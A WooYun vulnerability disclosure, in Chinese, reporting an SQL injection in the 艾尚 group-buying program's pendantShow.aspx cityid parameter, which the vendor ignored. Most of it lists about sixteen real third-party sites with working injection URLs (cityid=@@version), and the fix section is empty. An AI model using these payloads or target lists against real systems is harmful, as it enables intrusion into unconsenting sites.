漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-12-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
艾尚团购程序存在一处SQL注入,谷歌几十页不重样
官网:http://www.asdht.com/
案例:
http://tuan.eduts.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuan.2760391.cn/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.ndtuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://m.5izi.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://benear.net/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tg.mm315.cn/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.pxtb.org/help/pendantShow.aspx?stype=3&&cityid=@@version
http://jiaodatuan.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuan.mojing8.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version
http://www.tongluowan.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuan.hk360buy.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://58.53.209.134/help/pendantShow.aspx?stype=3&&cityid=@@version 电信的站
http://tuan.jetsoguide.com/bangzhu/pendantShow.aspx?stype=3&&cityid=@@version
http://www.mtuan365.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://tuangou.yongyao.net/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.vlvyou.com/help/pendantShow.aspx?stype=3&&cityid=@@version
漏洞证明:
我就随便演示几个站了
http://58.53.209.134/help/pendantShow.aspx?stype=3&&cityid=@@version
http://www.vlvyou.com/help/pendantShow.aspx?stype=3&&cityid=@@version
http://m.5izi.com/help/pendantShow.aspx?stype=3&&cityid=@@version
修复方案:
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝